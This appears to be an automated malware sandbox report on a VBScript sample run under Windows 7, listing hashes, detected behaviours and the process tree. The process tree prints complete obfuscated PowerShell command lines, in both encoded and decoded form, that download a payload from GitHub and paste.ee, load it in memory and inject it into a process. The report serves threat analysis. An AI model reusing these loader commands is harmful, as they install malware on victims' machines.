Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
01-10-2024 13:26
Static task
static1
Behavioral task
behavioral1
Sample
asegura.vbs
Resource
win7-20240903-en
General
-
Target
asegura.vbs
-
Size
483KB
-
MD5
f263136dd6f26628d6e5fbc4f52f1c0a
-
SHA1
294f56a012b9a3567ffd4b49a348a68cc64c73f8
-
SHA256
c2efd467a5a52d2ed84d765cf004c8fab1f4fdf714feae96b7f4b6adaf5bd793
-
SHA512
3b728b0b0014125f23b8dfb5a7c06a6293a301971b127474bfbd59a96b4528123e0081cd90989e41bd5e5be8b04f4cf465a385fe637b4f0368344206d5c1aca5
-
SSDEEP
12288:RGMsp3SuzEPHa8ZVVCRl0pzCwxn9Ki+GtW2r7aPZy6PLAAIbgTNixeQJbkLFjOnd:RGNQ7H+xC99
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2256 powershell.exe 4 2256 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2680 powershell.exe 2256 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 2 raw.githubusercontent.com 3 raw.githubusercontent.com 4 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2680 powershell.exe 2256 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 2256 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2764 wrote to memory of 2680 2764 WScript.exe 30 PID 2764 wrote to memory of 2680 2764 WScript.exe 30 PID 2764 wrote to memory of 2680 2764 WScript.exe 30 PID 2680 wrote to memory of 2256 2680 powershell.exe 32 PID 2680 wrote to memory of 2256 2680 powershell.exe 32 PID 2680 wrote to memory of 2256 2680 powershell.exe 32
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\asegura.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFyaWFiTGUgJypNRFIqJykubkFtRVszLDExLDJdLUpvSU4nJykoICgoJ3swfXUnKydybCA9IHsnKycxJysnfWh0dHBzOicrJy8vcmF3LmdpdGh1YicrJ3VzZXInKydjbycrJ250ZW50LmMnKydvbS8nKydOb0RldGVjdE9uL05vRCcrJ2V0JysnZWN0JysnT24vcmUnKydmcycrJy8nKydoJysnZWFkJysncy9tYScrJ2luL0RldGFoJysnTicrJ290aC0nKydWLicrJ3QnKyd4dCcrJ3sxfTsnKycgezB9YmFzZTY0Q29udGVudCcrJyAnKyc9IChOZXctT2JqZWMnKyd0JysnIFN5Jysnc3QnKydlbS5OJysnZXQuVycrJ2ViQ2wnKydpJysnZW4nKyd0JysnKScrJy5EJysnb3duJysnbG8nKydhJysnZFMnKyd0cmluZycrJygnKyd7MH11cmwpOyB7MH1iaW5hcnlDJysnb250ZScrJ250ICcrJz0gW1MnKyd5cycrJ3QnKydlbScrJy5DbycrJ252ZXJ0XTo6RnJvbScrJ0JhJysncycrJ2U2JysnNCcrJ1N0cicrJ2luZyh7JysnMH1iJysnYXNlJysnNjQnKydDb24nKyd0ZW50KTsgJysneycrJzB9YXMnKydzZScrJ21ibCcrJ3kgPScrJyAnKydbUicrJ2UnKydmJysnbCcrJ2VjdGlvJysnbicrJy4nKydBc3NlbWJseScrJ106OicrJ0xvYScrJ2QoJysneycrJzB9YicrJ2luYScrJ3InKyd5QycrJ29udGUnKydudCk7JysnICcrJ1snKydkbmxpYi5JTycrJy5Ib21lJysnXScrJzo6VkEnKydJJysnKCcrJ3syfTAnKycvOVpsbScrJzIvZC8nKydlZScrJy5ldHMnKydhcCcrJy8vOnNwdHRoeycrJzJ9LCB7Mn1kZXMnKydhdGknKyd2JysnYWRvezJ9LCB7MicrJ31kZScrJ3MnKydhdCcrJ2l2YWQnKydveycrJzJ9LCcrJyAnKyd7JysnMicrJ31kZXNhdGknKyd2JysnYScrJ2QnKydvezJ9LCAnKyd7MicrJ31BZGRJJysnblByJysnb2MnKydlc3MzMicrJ3syJysnfSwgezJ9ezJ9LHsyfXsyJysnfSknKS1mIFtjaGFyXTM2LFtjaGFyXTM5LFtjaGFyXTM0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vAriabLe '*MDR*').nAmE[3,11,2]-JoIN'')( (('{0}u'+'rl = {'+'1'+'}https:'+'//raw.github'+'user'+'co'+'ntent.c'+'om/'+'NoDetectOn/NoD'+'et'+'ect'+'On/re'+'fs'+'/'+'h'+'ead'+'s/ma'+'in/Detah'+'N'+'oth-'+'V.'+'t'+'xt'+'{1};'+' {0}base64Content'+' '+'= (New-Objec'+'t'+' Sy'+'st'+'em.N'+'et.W'+'ebCl'+'i'+'en'+'t'+')'+'.D'+'own'+'lo'+'a'+'dS'+'tring'+'('+'{0}url); {0}binaryC'+'onte'+'nt '+'= [S'+'ys'+'t'+'em'+'.Co'+'nvert]::From'+'Ba'+'s'+'e6'+'4'+'Str'+'ing({'+'0}b'+'ase'+'64'+'Con'+'tent); '+'{'+'0}as'+'se'+'mbl'+'y ='+' '+'[R'+'e'+'f'+'l'+'ectio'+'n'+'.'+'Assembly'+']::'+'Loa'+'d('+'{'+'0}b'+'ina'+'r'+'yC'+'onte'+'nt);'+' '+'['+'dnlib.IO'+'.Home'+']'+'::VA'+'I'+'('+'{2}0'+'/9Zlm'+'2/d/'+'ee'+'.ets'+'ap'+'//:sptth{'+'2}, {2}des'+'ati'+'v'+'ado{2}, {2'+'}de'+'s'+'at'+'ivad'+'o{'+'2},'+' '+'{'+'2'+'}desati'+'v'+'a'+'d'+'o{2}, '+'{2'+'}AddI'+'nPr'+'oc'+'ess32'+'{2'+'}, {2}{2},{2}{2'+'})')-f [char]36,[char]39,[char]34) )"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V9BUTKUEWTFXPZY94K8K.temp
Filesize7KB
MD53707a47b7c42fc586d8522719ad64a59
SHA18448248e3e177bb9d1b2ff53eeea2afaea0f5de0
SHA256fea3c5a02af8732ee2aec36b4c4d2438609b729a7b9f2dee6a1a6c62c39ace76
SHA51240ab7d260e5070448fa4e22077d66e675c92c6b2cffb440bbe490b48a53051e44448659f8638e13e94e28c4eb65605528bf6b608150bc0c94a04af912ba9f13b